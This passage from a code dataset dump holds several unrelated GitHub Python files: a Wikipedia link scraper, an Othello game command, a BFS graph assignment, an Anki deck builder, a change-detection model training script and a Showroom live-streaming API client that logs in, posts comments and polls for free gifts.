profile.to_file(\"report.html\")\n\n le: LabelEncoder = LabelEncoder()\n data_encoded: pd.DataFrame = df.apply(lambda col: le.fit_transform(col) if col.dtype == 'object' else col)\n\n y: pd.DataFrame = data_encoded['Retorno sobre Investimento (ROI)']\n x: pd.DataFrame = data_encoded.loc[:, df.columns != 'Retorno sobre Investimento (ROI)']\n\n x_treino, x_teste, y_treino, y_teste = train_test_split(x, y, test_size=0.2, random_state=23)\n\n train_and_evaluate_decision_tree(x_treino, y_treino, x_teste, y_teste)\n\n train_and_evaluate_linear_regression(x_treino, y_treino, x_teste, y_teste)\n","repo_name":"Eduardo681/crispdm","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5571,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28932139332","text":"import re\n\nname = input(\"Enter file:\")\nhandle = open(name)\nsum=0\nfor line in handle.readlines():\n\tnums = re.findall(\"[0-9]+\" ,line)\n\tfor num in nums:\n\t\tsum = sum + int(num) \n\t\t\nprint(sum)","repo_name":"ymlai87416/PythonPlayground","sub_path":"PythonOnline/web-assignment01/sum_num.py","file_name":"sum_num.py","file_ext":"py","file_size_in_byte":187,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"71476960362","text":"\"\"\"get values from wiki site with bs4\"\"\"\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom validators import url as valid_url\n\nWIKI_RANDOM = 
'https://ru.wikipedia.org/wiki/Special:Random'\nWIKI_DOMAIN = \"https://ru.wikipedia.org\"\nPATH = r'C:/Users/dasha/PycharmProjects/Evstratova-Darya-11-104'\n\n\ndef get_byte(url):\n    \"\"\"method to get the byte code\"\"\"\n    # Fetch the data from the URL\n    response = requests.get(url)\n    # Take the response content as bytes\n    code = response.content\n    return code\n\n\ndef soup_of_code(code):\n    \"\"\"method to get the html code\"\"\"\n    # Parse the html code\n    soup = BeautifulSoup(code, 'lxml')\n    return soup\n\n\ndef get_urls(soup):\n    \"\"\"get all urls\"\"\"\n    # Select by attribute and filter out the rest\n    new_soup = soup.select('div[class=mw-parser-output]')\n    # Check that the resulting list is not empty\n    if len(new_soup) == 0:\n        return []\n    # Pick the links out of the list\n    urls = new_soup[0].findAll('a')\n    # Create a list for the wiki links\n    link_wiki = []\n    for elem in urls:\n        # Extract the link without tags\n        link = str(elem.get(\"href\"))\n        # Check that the link points to a wiki page\n        if '/wiki/' in link:\n            url = ''.join([WIKI_DOMAIN, link])\n            # If the link is valid, add it to the list of links\n            if valid_url(url):\n                link_wiki.append(url)\n    return link_wiki\n\ndef put_text(soup, data_cls):\n    \"\"\"put words and count them\"\"\"\n    # Create an instance of the class\n    data = data_cls()\n    # Extract the text of the wiki page together with the tags\n    text = soup.find('div', class_=\"mw-parser-output\")\n    # Check that the page contains text\n    if text is None:\n        return data\n    # The text content\n    text = text.text\n    # Convert the text into a list of words\n    words = list(map(lambda s: s.lower().strip(), filter(lambda s: s.isalpha(), text.split())))\n    # Iterate over all words\n    for elem in words:\n        # Check whether the word is already in the map\n        if elem in data:\n            # If it is, increment the counter\n            data[elem] = data[elem] + 1\n        else:\n            # Otherwise add it with the value one\n            data[elem] = 1\n    return data\n\nif __name__ == \"__main__\":\n    print(get_urls(soup_of_code(get_byte(WIKI_RANDOM))))\n","repo_name":"DashaEvstratova/Evstratova-Darya-11-104-","sub_path":"src/parsers/wikipedia_parsing_bs4.py","file_name":"wikipedia_parsing_bs4.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36480612989","text":"from django.core.management.base import BaseCommand\nfrom othello2.parts.main_class import Board, PlayerCharacter\n\n\nclass Command(BaseCommand):\n    def handle(self, *args, **options):\n        match = OneMatch()\n        match.start()\n\n\nclass OneMatch(object):\n    def __init__(self):\n        self.board = Board(0x0000000810000000, 0x0000001008000000)\n        self.player_black = PlayerCharacter(1, recursive_depth=6)\n        self.player_white = PlayerCharacter(-1, recursive_depth=5)\n\n    def start(self):\n        while True:\n            self.board.print_board()\n            self.manual_turn(1)\n            if self.board.is_game_over():\n                self.board.print_board()\n                break\n\n            self.board.print_board()\n            self.pc_turn(-1)\n            if self.board.is_game_over():\n                self.board.print_board()\n                break\n\n    def manual_turn(self, color):\n        if not self.board.has_legal(color):\n            print('no available positions')\n            return\n        while True:\n            message = {1: 'black', -1: 'white'}[color]\n            pos = input(f'{message} pos >>> ')\n            pos = 2 ** int(pos)\n            if not (self.board.get_legal_bit(color) & pos):\n                print('not legal')\n                continue\n            self.board = self.board.put_stone(pos, color)\n            break\n\n    def pc_turn(self, color):\n        if not self.board.has_legal(color):\n            print('no available positions')\n            return\n        player = {1: self.player_black, -1: 
self.player_white}[color]\n        put = player.get_best_move_bit(self.board)\n        if put:\n            print(self.bit_to_number(put))\n            self.board = self.board.put_stone(put, color)\n\n    # for debugging\n    def print_bit(self, bit):\n        tmp = format(bit, 'b').zfill(64)\n        for i in range(8):\n            print(tmp[i*8:i*8+8])\n        print()\n\n    def bit_to_number(self, bit):\n        return len(format(bit, 'b')) - 1\n","repo_name":"kuryu920623/othello2","sub_path":"othello2/management/commands/match.py","file_name":"match.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"4955561399","text":"def loadGraph(edgeFilename):\r\n    \"\"\"Reads in the file of edge data\"\"\"\r\n\r\n    edgeFilename = open(edgeFilename)\r\n\r\n    edges = {}\r\n\r\n    for line in edgeFilename.readlines():\r\n        from_vertex = int(line.split()[0])\r\n        to_vertex = int(line.split()[1])\r\n\r\n        if from_vertex not in edges:\r\n            edges[from_vertex] = []\r\n\r\n        edges[from_vertex].append(to_vertex)\r\n\r\n    return edges\r\n\r\nclass MyQueue:\r\n    def __init__(self):\r\n        \"\"\"Initialize an empty queue\"\"\"\r\n        self.queue = []\r\n\r\n    def __str__(self):\r\n        \"\"\"Displays the contents of the queue\"\"\"\r\n        return str(self.queue)\r\n\r\n    def enqueue(self, value):\r\n        \"\"\"Storing in FIFO order\"\"\"\r\n        self.queue.append(value)\r\n\r\n    def dequeue(self):\r\n        \"\"\"Removing in FIFO order\"\"\"\r\n        if len(self.queue) == 0:\r\n            raise Exception('Queue is empty!')\r\n        return self.queue.pop(0)\r\n\r\n    def empty(self):\r\n        \"\"\"Checks whether the queue is empty\"\"\"\r\n        if len(self.queue) == 0:\r\n            return True\r\n        else:\r\n            return False\r\n\r\n\r\ndef BFS(G,s):\r\n    \"\"\"Runs breadth-first search algorithm\"\"\"\r\n    d = max(G.keys()) + 1 #size of the list\r\n    distance = [float('inf')] * d\r\n\r\n    Q = MyQueue()\r\n\r\n    distance[s] = 0\r\n    Q.enqueue(s)\r\n    while not Q.empty():\r\n        u = Q.dequeue()\r\n        if u not in G:\r\n            continue\r\n        for v in G[u]:\r\n            if distance[v] == float('inf'):\r\n                distance[v] = distance[u] + 1\r\n                Q.enqueue(v)\r\n    return distance\r\n\r\ndef distanceDistribution(G):\r\n    \"\"\"compute the distribution of all distances in G.\"\"\"\r\n    d = {}\r\n    count = 0\r\n    for node in G:\r\n        Distances = BFS(G, node)\r\n        for i in range(node + 1, len(Distances)):\r\n            distance = Distances[i]\r\n            # skip unreachable vertices\r\n            if distance == float('inf'):\r\n                continue\r\n            if distance in d:\r\n                d[distance] += 1\r\n            else:\r\n                d[distance] = 1\r\n            count += 1\r\n    # normalize the counts into fractions\r\n    for key in d:\r\n        d[key] = d[key] / count\r\n    return d\r\n\r\n\r\n# Test loadGraph Function\r\nprint(loadGraph('edges.txt'))\r\n\r\n# Test Queue Class\r\nQ = MyQueue()\r\nQ.enqueue(50)\r\nQ.enqueue(100)\r\nprint(Q)\r\nprint(Q.empty())\r\nQ.dequeue()\r\nprint(Q)\r\nQ.dequeue()\r\nprint(Q)\r\nprint(Q.empty())\r\n\r\n# Test BFS Function\r\nG = loadGraph('edges.txt')\r\nresult = BFS(G, 200)\r\nprint(result)\r\n\r\n# Test distanceDistribution Function\r\nG = loadGraph('edges.txt')\r\nprint(distanceDistribution(G))\r\n\r\n# To what extent does this network satisfy the small world phenomenon?\r\n# Could not get my last function. 
Assuming that this network satisfies the small world phenomenon\r\n# by the percentages showing that most nodes are connected in 6 degrees or less.\r\n","repo_name":"bebedactyl/Algorithms","sub_path":"swp.py","file_name":"swp.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38376067692","text":"import csv\nimport random\nimport genanki\nimport sys\n\n\nclass DeckBuilder:\n\n def basename(self, x):\n if (x == \"\"):\n return \n return (x.split('/'))[-1]\n\n # return (status,url) :\n # where status : -1 -> not found , 0 -> found , 1 -> related word found\n def build_deck(self, augments, deck_filename, deck_title, media_dir):\n anki_model_name = \"spanish-vocabulary-v1.0\"\n model_id = random.randrange(1 << 30, 1 << 31)\n style = \"\"\"\n .card {\n font-family: arial;\n font-size: 24px;\n text-align: center;\n color: black;\n background-color: white;\n }\n \"\"\"\n\n anki_model = genanki.Model(\n model_id,\n anki_model_name,\n fields=[\n {\"name\": \"Spanish\"},\n {\"name\": \"English\"},\n {\"name\": \"Lat-Am-Pronunciation\"},\n {\"name\": \"Picture\"}\n ],\n templates=[\n # only include audio in front side if it exists\n {\n \"name\": \"Audio | Text (Spanish)\",\n \"qfmt\": '
What is \"{{Spanish}}\" in English ?{{#Lat-Am-Pronunciation}}{{Lat-Am-Pronunciation}}{{/Lat-Am-Pronunciation}}',\n                \"afmt\": '{{English}}',\n            },\n            # only include audio in backside if it exists\n            {\n                \"name\": \"English\",\n                \"qfmt\": 'What is \"{{English}}\" in Spanish?',\n                \"afmt\": '{{Spanish}}{{#Lat-Am-Pronunciation}}{{Lat-Am-Pronunciation}}{{/Lat-Am-Pronunciation}}',\n            },\n            {\n                \"name\": \"Audio Only\",\n                \"qfmt\": 'What is this word in English?{{Lat-Am-Pronunciation}}',\n                \"afmt\": '{{English}}',\n            },\n            {\n                \"name\": \"Picture\",\n                \"qfmt\": '{{Picture}}What is this in Spanish?',\n                \"afmt\": '{{Spanish}}
        ',\n            },\n        ],\n        css=style,\n    )\n\n    # Generate the Anki Deck from the given csv file\n    anki_notes = []\n    anki_deck = genanki.Deck(model_id, deck_title)\n    anki_package = genanki.Package(anki_deck)\n\n    for row in augments:\n        # Foreign\n        # English\n        # Pronunciation\n        # Image\n        card_fields = [row['Foreign'], row['English']]\n        print(f\"processing {row['Foreign']} {row['English']} {row['Pronunciation']} {row['Image']}\")\n        if (row['Pronunciation'] is not None):\n            # audio_path = media_dir+\"/audio/\"+row[0]+\".mp3\"\n            # anki_package.media_files.append(audio_path) # libro.mp3\n            anki_package.media_files.append(row['Pronunciation']) # libro.mp3\n            card_fields.append(\"[sound:\"+self.basename(row['Pronunciation'])+\"]\")\n        else:\n            card_fields.append(\"\")\n\n        if (row['Image'] is not None):\n            # image_path = media_dir+\"/image/\"+row[0]+\".jpg\"\n            # anki_package.media_files.append(image_path) # libro.jpg\n            anki_package.media_files.append(row['Image']) # libro.jpg\n            card_fields.append(\"<img src='\"+self.basename(row['Image'])+\"'>\")\n        else:\n            card_fields.append(\"\")\n\n        anki_note = genanki.Note(\n            model=anki_model,\n            fields=card_fields\n        )\n\n        anki_notes.append(anki_note)\n\n    random.shuffle(anki_notes)\n    for anki_note in anki_notes:\n        anki_deck.add_note(anki_note)\n\n    anki_package.write_to_file(deck_filename)\n","repo_name":"matthewKeville/flash-lang","sub_path":"FlashLang/DeckBuilder.py","file_name":"DeckBuilder.py","file_ext":"py","file_size_in_byte":3863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21015633431","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@Time : 2022/2/25/025 16:44\r\n@Author : NDWX\r\n@File : train.py\r\n@Software: PyCharm\r\n\"\"\"\r\nimport glob\r\nimport random\r\nimport time\r\nimport warnings\r\n\r\nimport numpy as np\r\nimport torch\r\nfrom tqdm import tqdm\r\n\r\nfrom models.dsnunet import DSNUNet\r\nfrom utils.data_process import cal_val_f1\r\nfrom utils.opt_loader import load_opt, build_dataloader\r\nfrom utils.trick import random_scale\r\n\r\nwarnings.filterwarnings('ignore')\r\ntorch.backends.cudnn.enabled = True\r\nDEVICE = 'cuda:0' if torch.cuda.is_available() else 'cpu'\r\n\r\n\r\n# fix the random seeds for reproducibility\r\ndef setup_seed(seed):\r\n    torch.manual_seed(seed)\r\n    torch.cuda.manual_seed_all(seed)\r\n    np.random.seed(seed)\r\n    random.seed(seed)\r\n    torch.backends.cudnn.deterministic = True\r\n\r\n\r\n# load the model\r\ndef load_model(DEVICE, deep_supervision=False, pretrain=False, pretrain_model_path=None):\r\n    model = DSNUNet(rgb_init=32, sar_init=8, rgb_ch=3, sar_ch=2, out_ch=2, deep_supervision=deep_supervision)\r\n    model.to(DEVICE)\r\n    if pretrain:\r\n        model.load_state_dict(torch.load(pretrain_model_path))\r\n    return model\r\n\r\n\r\n# training function\r\ndef train(num_epochs, optimizer, scheduler, loss_fn, train_loader, valid_loader, model, save_path,\r\n          multi_scale=False, deep_supervision=False):\r\n    epochs = num_epochs + 1\r\n    header = r'Epoch/EpochNum | TrainLoss | ValidF1 | Time(m)'\r\n    raw_line = r'{:5d}/{:8d} | {:9.3f} | {:9.3f} | {:9.2f}'\r\n    print(header)\r\n    # track the best validation F1 so far, to decide whether to save the current model\r\n    best_f1 = 0\r\n    best_f1_epoch = 0\r\n    train_loss_epochs, val_f1_epochs, lr_epochs = [], [], []\r\n    for epoch in range(1, epochs):\r\n        model.train()\r\n        losses = []\r\n        start_time = time.time()\r\n        for batch_index, (x1, x2, y) in enumerate(tqdm(train_loader)):\r\n            accumulation_steps = 16 / x1.shape[0]\r\n            x1, x2, y = x1.float(), x2.float(), y.long()\r\n            if multi_scale:\r\n                scale = random.uniform(0.7, 1.3)\r\n                x1, x2, y = random_scale(x1, x2, y, x1.shape[2:], (scale, scale))\r\n            
x1, x2, y = x1.to(DEVICE), x2.to(DEVICE), y.to(DEVICE)\r\n if deep_supervision:\r\n loss = 0\r\n outputs = model(x1, x2)\r\n for output in outputs:\r\n loss += loss_fn(output, y)\r\n loss /= len(outputs)\r\n else:\r\n output = model(x1, x2)\r\n loss = loss_fn(output, y)\r\n loss = loss / accumulation_steps\r\n loss.backward()\r\n if ((batch_index + 1) % accumulation_steps) == 0:\r\n optimizer.step()\r\n optimizer.zero_grad()\r\n losses.append(loss.item())\r\n scheduler.step()\r\n val_f1 = cal_val_f1(model, valid_loader, deep_supervision=deep_supervision)\r\n train_loss_epochs.append(np.array(losses).mean())\r\n val_f1_epochs.append(np.mean(val_f1))\r\n lr_epochs.append(optimizer.param_groups[0]['lr'])\r\n print(raw_line.format(epoch, num_epochs, np.array(losses).mean(),\r\n np.mean(val_f1),\r\n (time.time() - start_time) / 60 ** 1), end=\"\")\r\n if best_f1 < val_f1:\r\n best_f1 = val_f1\r\n best_f1_epoch = epoch\r\n torch.save(model.state_dict(), save_path)\r\n print(\" valid F1 is improved. the model is saved.\")\r\n else:\r\n print(\"\")\r\n return train_loss_epochs, val_f1_epochs, lr_epochs\r\n\r\n\r\nif __name__ == '__main__':\r\n random_seed = 1021\r\n num_epochs = 100\r\n batch_size = 8\r\n channels = 5\r\n lr = 1e-3\r\n multi_scale = False\r\n use_style_transfer = False\r\n use_k_fold = False\r\n deep_supervision = False\r\n setup_seed(random_seed)\r\n train_dataset = [sorted(glob.glob(\"../data/train/A/*.tif\")), sorted(glob.glob(\"../data/train/B/*.tif\")),\r\n sorted(glob.glob(\"../data/train/OUT/*.tif\"))]\r\n val_dataset = [sorted(glob.glob(\"../data/val/A/*.tif\")), sorted(glob.glob(\"../data/val/B/*.tif\")),\r\n sorted(glob.glob(\"../data/val/OUT/*.tif\"))]\r\n model_save_path = \"../user_data/model_data/change_detection.pth\"\r\n train_loader, valid_loader = build_dataloader(train_dataset, val_dataset, int(batch_size), use_style_transfer)\r\n model = load_model(DEVICE, deep_supervision=deep_supervision)\r\n optimizer, scheduler, loss_fn = load_opt(model, lr)\r\n train_loss_epochs, val_mIoU_epochs, lr_epochs = train(num_epochs, optimizer, scheduler, loss_fn,\r\n train_loader, valid_loader, model, model_save_path,\r\n multi_scale=multi_scale, deep_supervision=deep_supervision)\r\n","repo_name":"NightSongs/DSNUNet","sub_path":"code/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4781,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"19"} +{"seq_id":"36580379542","text":"\"\"\"Connections Manager.\"\"\"\nimport re\nimport uuid\nimport time\nimport json\nimport datetime\n#import urllib2\n#from lxml import etree\nfrom pytz import timezone\nfrom parse import parse\n\nfrom srtools.manager.api.showroomwebservice import _ShowroomWebService\nfrom srtools.utils.loggingutils import log_error\n\nclass ShowroomAPI(_ShowroomWebService):\n \"\"\"Showroom API implementation.\"\"\"\n def query_csrf_token(self):\n \"\"\"\n :returns: The current valid CSRF token.\n :rtype: string\n \"\"\"\n return self._query_csrf_token()\n\n def set_timeout(self, room, timeout):\n \"\"\"\n Sets timeout.\n :param room: The room to know if it's official or amateur block.\n :type room: Room\n \"\"\"\n try:\n self.connections_manager.twitter_timeout[room.official] = str(timeout)\n except Exception as err:\n log_error(err)\n\n def clear_timeout(self, room):\n \"\"\"\n Clears timeout.\n :param room: The room belonging to the type to clear.\n :type room: Room\n \"\"\"\n self.connections_manager.twitter_timeout[room.official] = None\n\n def 
get_timeout(self, room):\n \"\"\"\n Returns timeout for given room.\n :param room: Room to check.\n :type room: Room\n :returns: When the bonus ban is lifted, None otherwise.\n :rtype: bool\n \"\"\"\n return self.connections_manager.twitter_timeout[room.official]\n\n def do_polling(self, room):\n \"\"\"\n :param room: The room to query.\n :type room: Room\n :returns: 0 if free items were obtained. 1 if broadcast ended. 2 if nothing, 3 if error.\n :rtype: int\n \"\"\"\n result = 2\n try:\n respjson = self._query_polling(room).json()\n if respjson.get('live_watch_incentive'):\n if respjson['live_watch_incentive'].get('ok') == 1:\n self.clear_timeout(room)\n result = 0\n else:\n result = 2\n else:\n if respjson.get('invalid') == 1:\n result = 1\n except ValueError as err:\n result = 3\n except Exception as err:\n result = 3\n log_error(err)\n\n return result\n\n def get_current_user(self, room):\n \"\"\"\n :param room: The room from where to extract the information.\n :type room: Room\n :returns: JSON with the information, None if error or invalid.\n :rtype: string\n \"\"\"\n respjson = None\n try:\n resp = self._query_current_user(room)\n if resp is not None:\n respjson = resp.json()\n\n if respjson.get('user_id') == 0 or respjson.get('errors') is not None:\n respjson = None\n except Exception as err:\n log_error(err)\n\n return respjson\n\n def get_onlive_num(self):\n \"\"\"\n Gets the amount of rooms broadcasting.\n :returns: Amount of live broadcasts, -1 if failed.\n :rtype: int\n \"\"\"\n result = -1\n try:\n resp = self._query_onlive_num()\n if resp is not None:\n respjson = resp.json()\n result = respjson.get('num')\n except Exception as err:\n log_error(err)\n\n return result\n\n def get_onlives(self):\n \"\"\"\n Gets all the online rooms.\n :returns: JSON with the onlives. 
None if failed.\n :rtype: string\n \"\"\"\n respjson = None\n try:\n resp = self._query_onlives()\n if resp is not None:\n respjson = resp.json()\n except Exception as err:\n log_error(err)\n\n return respjson\n\n def get_summary_ranking(self, room):\n \"\"\"\n Gets the historical top 30.\n :param room: The room to query.\n :type room: Room\n :returns: JSON with the ranking, None if not possible.\n :rtype: string\n \"\"\"\n respjson = None\n try:\n resp = self._query_summary_ranking(room)\n if resp is not None:\n respjson = resp.json()\n except Exception as err:\n log_error(err)\n\n return respjson\n\n def get_stage_user_list(self, room):\n \"\"\"\n Gets the stage user list from a room.\n :param room: The room to query.\n :type room: Room\n :returns: JSON with the people in the room, None if failed.\n :rtype: string\n \"\"\"\n respjson = None\n try:\n resp = self._query_stage_user_list(room)\n if resp is not None:\n respjson = resp.json()\n except Exception as err:\n log_error(err)\n\n return respjson\n\n def get_stage_user_list_anteroom(self, room):\n \"\"\"\n Gets the anteroom stage user list from a room.\n :param room: The room to query.\n :type room: Room\n :returns: JSON with the people in the room, None if failed.\n :rtype: string\n \"\"\"\n respjson = None\n try:\n resp = self._query_stage_user_list_anteroom(room)\n if resp is not None:\n respjson = resp.json()\n except Exception as err:\n log_error(err)\n\n return respjson\n\n def get_stage_gift_list(self, room):\n \"\"\"\n Gets the stage gift list from a room (towers and above).\n :param room: The room to query.\n :type room: Room\n :returns: JSON with the gifts in the room, None if failed.\n :rtype: string\n \"\"\"\n respjson = None\n try:\n resp = self._query_stage_gift_list(room)\n if resp is not None:\n respjson = resp.json()\n except Exception as err:\n log_error(err)\n\n return respjson\n\n def get_gift_list(self, room):\n \"\"\"\n Gets the gift list of the given room.\n :param room: The room to query.\n :type room: Room\n :returns: JSON with the gift list, none if failed.\n :rtype: string\n \"\"\"\n respjson = None\n try:\n resp = self._query_gift_list(room)\n if resp is not None:\n respjson = resp.json()\n except Exception as err:\n log_error(err)\n\n return respjson\n\n def get_setings(self, room):\n \"\"\"\n Gets settings for the room.\n :param room: The room to query.\n :type room: Room\n :returns: JSON with available performance types, None if failed.\n :rtype: string\n \"\"\"\n respjson = None\n try:\n resp = self._query_settings(room)\n if resp is not None:\n respjson = resp.json()\n except Exception as err:\n log_error(err)\n\n return respjson\n\n def get_telop(self, room):\n \"\"\"\n Gets the telop for the requested room.\n :param room: The room to query.\n :type room: Room\n :returns: The telop text if found, empty if not.\n :rtype: string\n \"\"\"\n result = ''\n try:\n resp = self._query_telop(room)\n if resp is not None:\n respjson = resp.json()\n result = respjson.get('telop')\n except Exception as err:\n log_error(err)\n\n return result\n\n def get_event_and_support(self, room):\n \"\"\"\n Gets the event information of the room.\n :param room: The room to query.\n :type room: Room\n :returns: JSON, or None if failed.\n :rtype: string\n \"\"\"\n respjson = None\n try:\n resp = self._query_event_and_support(room)\n if resp is not None:\n respjson = resp.json()\n except Exception as err:\n log_error(err)\n\n return respjson\n\n def get_gift_log(self, room):\n \"\"\"\n Gets the gift log from the room.\n :param 
room: The room to query.\n :type room: Room\n :returns: JSON, or None if failed.\n :rtype: string\n \"\"\"\n respjson = None\n try:\n resp = self._query_gift_log(room)\n if resp is not None:\n respjson = resp.json()\n except Exception as err:\n log_error(err)\n\n return respjson\n\n def get_questionnaire_result(self, room):\n \"\"\"\n Gets the result of a questionnaire.\n :param room: The room to query.\n :type room: Room\n :returns: JSON, or None if failed.\n :rtype: string\n \"\"\"\n respjson = None\n try:\n resp = self._query_questionnaire_result(room)\n if resp is not None:\n respjson = resp.json()\n except Exception as err:\n log_error(err)\n\n return respjson\n\n def get_user_profile(self, room, user):\n \"\"\"\n Gets user profile from given room.\n :param room: Room to query.\n :type room: Room\n :param user: User to query.\n :type user: User\n :returns: HTML with popup\n :rtype: string\n \"\"\"\n try:\n result = self._query_user_profile(room, user)\n except Exception as err:\n log_error(err)\n result = None\n\n return result\n\n def get_comment_log(self, room):\n \"\"\"\n Gets the room's comment log.\n :param room: Room to query.\n :type room: Room\n :returns: JSON, or None if failed.\n :rtype: string\n \"\"\"\n respjson = None\n try:\n resp = self._query_comment_log(room)\n if resp is not None:\n respjson = resp.json()\n except Exception as err:\n log_error(err)\n respjson = None\n\n return respjson\n\n def get_banners(self, room):\n \"\"\"\n Gets the banners of the room.\n :param room: Room to query.\n :type room: Room\n :returns: JSON, or None if failed.\n :rtype: string\n \"\"\"\n try:\n result = self._query_banners(room)\n except Exception as err:\n log_error(err)\n result = None\n\n return result\n\n def refresh_token(self):\n \"\"\"\n Updates the csrf token if necessary.\n :returns: Whether a new token was obtained or not.\n :rtype: bool\n \"\"\"\n result = False\n try:\n resp = self.connections_manager.get(\"https://www.showroom-live.com\")\n token = re.search('name=\"csrf_token\" value=\"([^\"]*)\"', resp.content).groups()[0]\n\n if self.query_csrf_token() != token:\n print(f\"Refreshing csrf_token from {self.query_csrf_token()} to {token}.\")\n self.current_csrf_token = token\n else:\n print(f\"Current csrf_token {self.query_csrf_token()} still valid.\")\n\n result = True\n\n except Exception as _err:\n print(f\"Could not refresh csrf_token, using default {self.query_csrf_token()}.\")\n\n return result\n\n def can_get_bonus(self, room):\n \"\"\"\n Check whether bonus can be obtained.\n :param room: The room from where to check.\n :type room: Room\n :returns: True if it can be obtained, False otherwise.\n :rtype: bool\n \"\"\"\n if not self.connections_manager.forbidden:\n result = True\n\n if self.connections_manager.twitter_timeout[room.official] is not None:\n japan_time = datetime.datetime.now(tz=timezone('Asia/Tokyo')).time()\n\n result = (self.connections_manager.twitter_timeout[room.official] < japan_time)\n if result:\n self.connections_manager.twitter_timeout[room.official] = None\n else:\n result = False\n\n return result\n\n def is_online(self, room_id):\n \"\"\"\n Checks if the given room is online.\n :param room_id: The room id to query.\n :type room_id: int\n :returns: True if it's online, False otherwise.\n :rtype: bool\n \"\"\"\n result = False\n try:\n resp = self._query_is_online(room_id)\n if resp is not None:\n respjson = resp.json()\n result = (respjson.get('ok') == 1)\n #result = (respjson.get('live_status') == 2)\n except Exception as err:\n 
log_error(err)\n\n return result\n\n def login(self, username, password):\n \"\"\"Login.\"\"\"\n result = False\n\n try:\n if self.refresh_token():\n\n resp = self._query_login(username, password)\n if resp is not None:\n respjson = resp.json()\n if respjson.get(\"ok\") == 1:\n result = True\n elif respjson.get(\"error\") == 'Already logged in.':\n result = True\n\n except Exception as err:\n log_error(err)\n\n return result\n\n def get_live(self, room, lives_manager):\n \"\"\"\n Returns broadcast id from given room.\n :param room: The room to query.\n :type room: Room\n :param lives_manager: Current lives manager.\n :type lives_manager: LivesManager\n :returns: Live object.\n :rtype: Live\n \"\"\"\n result = None\n try:\n if self.is_online(room.room_id):\n data = self._query_live_data(room).json()\n live_id = int(data['live_id'])\n result = lives_manager.find(live_id)\n\n if result is None:\n result = lives_manager.create(live_id)\n\n room.live = result\n except Exception as err:\n log_error(err)\n\n return result\n\n def get_live_data(self, room, lives_manager):\n \"\"\"\n Returns broadcast information from given room.\n :param room: The room to query.\n :type room: Room\n :param lives_manager: Current lives manager.\n :type lives_manager: LivesManager\n :returns: Live object.\n :rtype: Live\n \"\"\"\n result = None\n try:\n respjson = None\n\n if self.is_online(room.room_id):\n resp = self._query_live_data(room)\n if resp is not None:\n respjson = resp.json()\n live_id = int(respjson['live_id'])\n result = lives_manager.find(live_id)\n\n if result is None:\n result = lives_manager.create(live_id)\n\n lives_manager.refresh(result, respjson)\n except Exception as err:\n log_error(err)\n\n return result\n\n def send_comment(self, live, comment, max_tries=5, delay=1):\n \"\"\"\n Sends the given comment to the given broadcast.\n :param live: Live object where to send the comment.\n :type live: Live\n :param comment: Comment to send.\n :type comment: string\n :param max_tries: Maximum amount of tries to send the comment.\n :type max_tries: int\n :returns: True if it could be sent, False otherwise.\n :rtype: bool\n \"\"\"\n result = False\n if max_tries < 1:\n max_tries = 1\n\n while not result and max_tries > 0:\n max_tries -= 1\n\n try:\n resp = self._query_comment(live, comment)\n respjson = resp.json()\n result = (respjson.get('ok') == 1)\n if not result:\n print(respjson)\n if respjson.get('errors'):\n if (respjson['errors'][0].get('error_user_msg') == \\\n 'This show has already ended.') or \\\n (respjson['errors'][0].get('error_user_msg') == \\\n 'Commenting is not available') :\n break\n elif respjson['errors'][0].get('error_user_msg') == 'Please try again.':\n time.sleep(delay)\n except Exception as err:\n log_error(err)\n\n return result\n\n def parse_timeout_error(self, room, error_message):\n \"\"\"\n Parse error message and set timeout.\n :param room: Room from where to check.\n :type room: Room\n :param error_message: Error message to parse.\n :type error_message: string\n \"\"\"\n try:\n waiting = parse(\"You can get free gifts until {}.\", error_message)\n if waiting:\n self.set_timeout(room, datetime.datetime.strptime(waiting[0], \"%H:%M\").time())\n except Exception as err:\n log_error(err)\n\n def send_tweet(self, room, comment=None):\n \"\"\"\n Send tweet from the current room.\n :param room: The room from where to tweet.\n :type room: Room\n :param comment: The comment to send.\n :type comment: string\n :returns: True if bonus was gotten, False otherwise.\n :rtype: bool\n 
\"\"\"\n result = False\n\n if comment is None:\n uuid_value = str(uuid.uuid4())\n tweet_default = room.live.tweet_default if room.live and room.live.tweet_default \\\n else room.name + \" Broadcasting!\\n\"\n comment = tweet_default + uuid_value if len(tweet_default) + len(uuid_value) < 140 \\\n else tweet_default[:-36] + uuid_value\n\n resp = self._query_tweet(room, comment)\n try:\n respjson = resp.json()\n if respjson.get('ok') == 1:\n room.badge = True\n\n # {u'add': 1, u'ok': 1}\n # {u'add': 0, u'ok': 1}\n result = (respjson.get('add') == 1)\n if result:\n self.clear_timeout(room)\n else:\n # {u'api_error': 1, u'error': u'You can get free g...il 02:54.'}\n if respjson.get('api_error') == 1:\n if (respjson['error'] != u'\\u6295\\u7a3f\\u306b\\u5931\\u6557\\u3057\\u307e\\u3057\\u305f\\u3002') and (respjson['error'] != \"posting failed\"):\n self.parse_timeout_error(room, respjson['error'])\n except Exception as err:\n log_error(err)\n\n return result\n\n def update_profile(self, profile_configuration):\n \"\"\"\n :param profile_configuration: Configuration to use.\n :type profile_configuration: ProfileConfiguration\n :returns: True if the profile could be updated, False otherwise.\n :rtype: bool\n \"\"\"\n try:\n result = False\n if profile_configuration.avatar_id != None and profile_configuration.name != None:\n resp = self._query_profile(profile_configuration)\n result = (resp.url == u'https://www.showroom-live.com/user/my_profile_edit_done')\n except Exception as err:\n log_error(err)\n\n return result\n\n def get_next_live(self, room_id):\n \"\"\"\n :param room_id: Room to check.\n :type room_id: int\n :returns: The scheduled date for next broadcast, None if not available.\n :rtype: datetime.datetime\n \"\"\"\n result = 